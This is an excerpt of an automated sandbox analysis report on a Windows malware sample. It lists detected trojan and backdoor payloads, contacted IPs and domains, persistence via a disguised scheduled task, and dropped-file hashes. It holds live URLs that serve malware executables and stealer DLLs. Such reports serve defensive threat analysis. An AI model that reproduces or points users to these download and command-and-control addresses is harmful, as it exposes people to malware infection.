                          19.0.eugcwgv.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.0.eugcwgv.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          18.2.eugcwgv.5c15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.1.eugcwgv.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.NNOKmCIVoi.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.3.3412.exe.610000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          26.0.2655.exe.f80000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          25.3.12CC.exe.20b0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          0.2.NNOKmCIVoi.exe.4715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          24.2.454.exe.550e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          41.2.qflfaqod.exe.da0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          19.2.eugcwgv.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.2.3412.exe.500e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.0.eugcwgv.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          41.2.qflfaqod.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://78.46.160.87/vcruntime140.dll100%Avira URL Cloudmalware
                          http://data-host-coin-8.com/files/9993_1641737702_2517.exe100%Avira URL Cloudmalware
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://host-data-coin-11.com/0%URL Reputationsafe
                          http://78.46.160.87/nss3.dll0%Avira URL Cloudsafe
                          http://78.46.160.87/freebl3.dll100%Avira URL Cloudmalware
                          http://78.46.160.87/11250%Avira URL Cloudsafe
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/game.exe100%Avira URL Cloudmalware
                          https://goo.su/XvD0%Avira URL Cloudsafe
                          https://softwaresworld.net/wp-content/uploads/2022/8a444287feca136d19310b76ef81e54fc12.exe0%Avira URL Cloudsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://185.163.204.24//l/f/D2vuR34BZ2GIX1a3wJC_/425dba20a0279b2f685ed1dbaf2a802bdd8362610%Avira URL Cloudsafe
                          http://unicupload.top/install5.exe100%URL Reputationphishing
                          http://78.46.160.87/mozglue.dll100%Avira URL Cloudmalware
                          https://watson.telemetry.m0%Avira URL Cloudsafe
                          http://crl.ver)0%Avira URL Cloudsafe
                          http://185.163.204.22/capibar0%Avira URL Cloudsafe
                          https://%s.xboxlive.com0%URL Reputationsafe
                          http://78.46.160.87/softokn3.dll100%Avira URL Cloudmalware
                          https://goo.su/abhF0%Avira URL Cloudsafe
                          https://noc.social/@banda5ker100%Avira URL Cloudmalware
                          http://185.163.204.24//l/f/D2vuR34BZ2GIX1a3wJC_/2e2f0b66d11308f3e72c19e69852b8803e8aa69b0%Avira URL Cloudsafe
                          https://185.233.81.115/32739433.dat?iddqd=10%Avira URL Cloudsafe
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          https://dynamic.t0%URL Reputationsafe
                          http://sehfdkfjvgn.xyz/bit.exe0%Avira URL Cloudsafe
                          http://78.46.160.87/msvcp140.dll0%Avira URL Cloudsafe
                          http://78.46.160.87/0%Avira URL Cloudsafe
                          http://78.46.160.87/565100%Avira URL Cloudmalware
                          https://%s.dnet.xboxlive.com0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          unicupload.top
                          54.38.220.85
                          truefalse
                            high
                            host-data-coin-11.com
                            5.188.88.184
                            truefalse
                              high
                              patmushta.info
                              8.209.79.15
                              truefalse
                                high
                                cdn.discordapp.com
                                162.159.133.233
                                truefalse
                                  high
                                  microsoft-com.mail.protection.outlook.com
                                  40.93.207.0
                                  truefalse
                                    high
                                    sehfdkfjvgn.xyz
                                    37.140.192.50
                                    truefalse
                                      high
                                      goo.su
                                      172.67.139.105
                                      truefalse
                                        high
                                        transfer.sh
                                        144.76.136.153
                                        truefalse
                                          high
                                          noc.social
                                          149.28.78.238
                                          truefalse
                                            high
                                            softwaresworld.net
                                            94.102.49.170
                                            truefalse
                                              high
                                              data-host-coin-8.com
                                              5.188.88.184
                                              truefalse
                                                high
                                                privacytools-foryou-777.com
                                                unknown
                                                unknownfalse
                                                  high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://transfer.sh/get/wP2pzq/1.exefalse
                                                    high
                                                    http://78.46.160.87/vcruntime140.dlltrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://data-host-coin-8.com/files/9993_1641737702_2517.exetrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://185.7.214.171:8080/6.phptrue
                                                    • URL Reputation: malware
                                                    unknown
                                                    http://host-data-coin-11.com/false
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://78.46.160.87/nss3.dlltrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://78.46.160.87/freebl3.dlltrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://78.46.160.87/1125true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://185.163.204.24/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://data-host-coin-8.com/game.exetrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://goo.su/XvDfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://softwaresworld.net/wp-content/uploads/2022/8a444287feca136d19310b76ef81e54fc12.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://185.163.204.24//l/f/D2vuR34BZ2GIX1a3wJC_/425dba20a0279b2f685ed1dbaf2a802bdd836261true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://unicupload.top/install5.exetrue
                                                    • URL Reputation: phishing
                                                    unknown
                                                    http://78.46.160.87/mozglue.dlltrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://transfer.sh/get/QbPlFD/G.exefalse
                                                      high
                                                      http://185.163.204.22/capibarfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://78.46.160.87/softokn3.dlltrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://goo.su/abhFfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://noc.social/@banda5kertrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://185.163.204.24//l/f/D2vuR34BZ2GIX1a3wJC_/2e2f0b66d11308f3e72c19e69852b8803e8aa69btrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://185.233.81.115/32739433.dat?iddqd=1true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://transfer.sh/get/2w2PAQ/joke214324.exefalse
                                                        high
                                                        http://sehfdkfjvgn.xyz/bit.exefalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.discordapp.com/attachments/903666793514672200/930134152861343815/Nidifying.exefalse
                                                          high
                                                          http://78.46.160.87/msvcp140.dlltrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://transfer.sh/get/ealX1m/11.exefalse
                                                            high
                                                            http://78.46.160.87/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://78.46.160.87/565true
                                                            • Avira URL Cloud: malware
                                                            unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000003.308406030.0000024462C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.308577243.0000024462C40000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309508121.0000024462C42000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000002.309508121.0000024462C42000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.309295721.0000024462C13000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://api.ip.sb/ip2655.exe, 0000001A.00000002.447200055.0000000004331000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.308568100.0000024462C45000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.308396322.0000024462C67000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309664509.0000024462C6A000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://watson.telemetry.mWerFault.exe, 00000017.00000002.422645887.0000000004E8F000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.ver)svchost.exe, 00000004.00000002.609736637.00000202DB68A000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000003.308577243.0000024462C40000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.309295721.0000024462C13000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://%s.xboxlive.comsvchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      low
                                                                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.308406030.0000024462C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://dynamic.tsvchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000002.309478877.0000024462C3A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/adsvchost.exe, 00000004.00000002.557736532.00000202D60A7000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://activity.windows.comsvchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              low
                                                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpfalse
                                                                                                                                  high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  185.163.45.70
                                                                                                                                  unknownMoldova Republic of
                                                                                                                                  39798MIVOCLOUDMDfalse
                                                                                                                                  40.93.207.0
                                                                                                                                  microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                  188.166.28.199
                                                                                                                                  unknownNetherlands
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  172.67.139.105
                                                                                                                                  goo.suUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  54.38.220.85
                                                                                                                                  unicupload.topFrance
                                                                                                                                  16276OVHFRfalse
                                                                                                                                  144.76.136.153
                                                                                                                                  transfer.shGermany
                                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                                  78.46.160.87
                                                                                                                                  unknownGermany
                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                  185.7.214.171
                                                                                                                                  unknownFrance
                                                                                                                                  42652DELUNETDEtrue
                                                                                                                                  185.186.142.166
                                                                                                                                  unknownRussian Federation
                                                                                                                                  204490ASKONTELRUtrue
                                                                                                                                  94.102.49.170
                                                                                                                                  softwaresworld.netNetherlands
                                                                                                                                  202425INT-NETWORKSCfalse
                                                                                                                                  37.140.192.50
                                                                                                                                  sehfdkfjvgn.xyzRussian Federation
                                                                                                                                  197695AS-REGRUfalse
                                                                                                                                  162.159.133.233
                                                                                                                                  cdn.discordapp.comUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  149.28.78.238
                                                                                                                                  noc.socialUnited States
                                                                                                                                  20473AS-CHOOPAUSfalse
                                                                                                                                  185.233.81.115
                                                                                                                                  unknownRussian Federation
                                                                                                                                  50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                  8.209.79.15
                                                                                                                                  patmushta.infoSingapore
                                                                                                                                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                  5.188.88.184
                                                                                                                                  host-data-coin-11.comRussian Federation
                                                                                                                                  34665PINDC-ASRUfalse
                                                                                                                                  185.163.204.22
                                                                                                                                  unknownGermany
                                                                                                                                  20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                  185.163.204.24
                                                                                                                                  unknownGermany
                                                                                                                                  20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEtrue

                                                                                                                                  Private

                                                                                                                                  IP
                                                                                                                                  192.168.2.1
                                                                                                                                  127.0.0.1

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                  Analysis ID:551246
                                                                                                                                  Start date:11.01.2022
                                                                                                                                  Start time:23:36:17
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 15m 39s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:light
                                                                                                                                  Sample file name:NNOKmCIVoi.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:49
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.evad.winEXE@61/32@83/20
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 39.5% (good quality ratio 31.1%)
                                                                                                                                  • Quality average: 64%
                                                                                                                                  • Quality standard deviation: 39.1%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                  • Number of executed functions: 0
                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                  • HTTP Packets have been reduced
                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.5.146, 23.211.6.115, 23.211.4.86, 52.168.117.173, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.42.73.29, 20.54.110.249, 20.195.51.108
                                                                                                                                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, onedsblobprdeus16.eastus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, consumer-displaycatalogrp-aks2aks-asia.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-asia.md.mp.microsoft.com.akadns.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, sea-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, api.ip.sb, e16646.dscg.akamaiedge.net, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  23:37:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                  23:38:04Task SchedulerRun new task: Firefox Default Browser Agent 2B95DAFB04489C32 path: C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  23:38:21API Interceptor1x Sleep call for process: 454.exe modified
                                                                                                                                  23:38:35API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                  23:38:37API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                  23:39:01API Interceptor6x Sleep call for process: 8F03.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASN

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:MPEG-4 LOAS
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1310720
                                                                                                                                  Entropy (8bit):0.2485993954185659
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4l:BJiRdwfu2SRU4l
                                                                                                                                  MD5:BF1F685C97BC9FAB15971FCC8F49A444
                                                                                                                                  SHA1:7C3680AC7115AC2E1ACE681143CD1AAB1A34D572
                                                                                                                                  SHA-256:CD3737BA1FE5112B9F040331B9F2CC75E7CEBDAA929340F4DB8D0389BA186F71
                                                                                                                                  SHA-512:FE28C060A2C54E7C8EA764F0720AB50201B3F144DC8D49D2AB716A314B6A0624FFA22BFEDC10A15B20883E63F87E2422F1356D5FB9A3DBE8DE20D6EB9E244CA0
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x927cf06a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):786432
                                                                                                                                  Entropy (8bit):0.25075481919901355
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:0+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:LSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                  MD5:B60A7FBC134618B2CC80BF8C00E2FCA3
                                                                                                                                  SHA1:CB9DC9937AE78818AA09B7B7A3FA837591E4F4E5
                                                                                                                                  SHA-256:E25CE492DF3F21ED2BDA5018B20AEBF8ED64778F078A38AEA8D46CE8CB841805
                                                                                                                                  SHA-512:5BAFEAC3360934E581A561366FCE25395045A768E3EF32CA24D4683C4593F27298B0F48C6300C64FE7F00CEACBD03D36B2E9E2543F4154CF1FBBF86C7CB5B64A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: .|.j... ................e.f.3...w........................&..........w...%...zu.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.........................................................................................................................................................................................................................................+.%...z.................d....%...zu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16384
                                                                                                                                  Entropy (8bit):0.07670392576224366
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:WX7EvwAXvq8l/bJdAti2vFJW0tAll3Vkttlmlnl:WXiwAXvq8t4TvFk8A3
                                                                                                                                  MD5:4A1E1D2366415C80726A581060DC892F
                                                                                                                                  SHA1:59DB85C76EFC0ECB3DE51B0EB7DC0A08EBB8C661
                                                                                                                                  SHA-256:26590C3EC92C598E37D26EF86BBF320C05927C90AD8035A799D260B601ACBF53
                                                                                                                                  SHA-512:2833E60BF15D3311C2626706A4F58D34CADB2152665F513D2851038268FA98BA050B42C9554729A2C244A7C17A5D0BCF8967E9759E1C7FF5A778B17B6C41D559
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: B........................................3...w...%...zu......w...............w.......w....:O.....w..................d....%...zu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3412.exe_35f3196b77cc909196c7cf9fd139feb4da3837e7_5a51878a_15eaf95a\Report.wer
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8131570108564515
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:kpFlozcLLiCXiynz9OQoJ7R3V6tpXIQcQec6tycEfcw3bEz+HbHg/8BRTf3o8FaV:4IaLhX5c8HQ0lDjIq/u7suS274ItHX
                                                                                                                                  MD5:D139446912F352212938BB25C5161F33
                                                                                                                                  SHA1:D21B4DB6620E1BDD4C2EE997DB762C7DD8922C29
                                                                                                                                  SHA-256:FCF24D55EF32D93BF0563EECE24AD9F77938D56E131B30A2E8E8AF158BB7E00C
